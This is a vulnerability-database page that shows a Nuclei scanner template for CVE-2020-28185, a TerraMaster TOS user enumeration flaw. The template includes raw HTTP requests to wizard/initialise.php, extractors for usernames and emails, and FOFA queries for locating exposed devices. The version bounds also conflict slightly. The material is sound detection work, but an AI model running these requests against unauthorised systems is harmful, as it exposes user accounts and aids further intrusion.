| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2020-28185 | 24 Dec 202018:55 | – | circl | |
| Terramaster TOS Permission License and Access Control Issues Vulnerability | 24 Dec 202000:00 | – | cnnvd | |
| CVE-2020-28185 | 24 Dec 202014:26 | – | cve | |
| CVE-2020-28185 | 24 Dec 202014:26 | – | cvelist | |
| CVE-2020-28185 | 24 Dec 202015:15 | – | nvd | |
| Terramaster TOS < 4.2.07 Multiple Vulnerabilities - Active Check | 12 Jan 202100:00 | – | openvas | |
| CVE-2020-28185 | 24 Dec 202015:15 | – | osv | |
| Design/Logic Flaw | 24 Dec 202015:15 | – | prion | |
| CVE-2020-28185 | 22 May 202517:02 | – | redhatcve | |
| VulnCheck KEV: CVE-2020-28185 | 20 Nov 202300:00 | – | vulncheck_kev |
id: CVE-2020-28185
info:
name: TerraMaster TOS < 4.2.06 - User Enumeration
author: pussycat0x
severity: medium
description: |
User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
impact: |
An attacker can enumerate valid usernames, potentially aiding in further attacks.
remediation: |
Upgrade TerraMaster TOS to version 4.2.06 or later.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-28185
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
- https://www.terra-master.com/
- https://github.com/ArrestX/--POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-28185
epss-score: 0.18066
epss-percentile: 0.96838
cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: terra-master
product: tos
fofa-query:
- '"TerraMaster" && header="TOS"'
- '"terramaster" && header="tos"'
tags: cve2020,cve,terramaster,enum,tos,terra-master,vkev,vuln
http:
- raw:
- |
GET /tos/index.php?user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /wizard/initialise.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/tos/index.php?user/login
tab=checkuser&username=admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"email":'
- '"status":'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body_2
regex:
- '"username":"(.*?)"'
- '"email":"(.*?)"'
# digest: 4b0a00483046022100d59528eb932dec581cb4a13926f714f81417d704f15c79344e3687afb851874f02210093db8dda28401cd36c0b2c44ee8021bfdb0c469c9244e9aeb81d9b484d7eac29:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation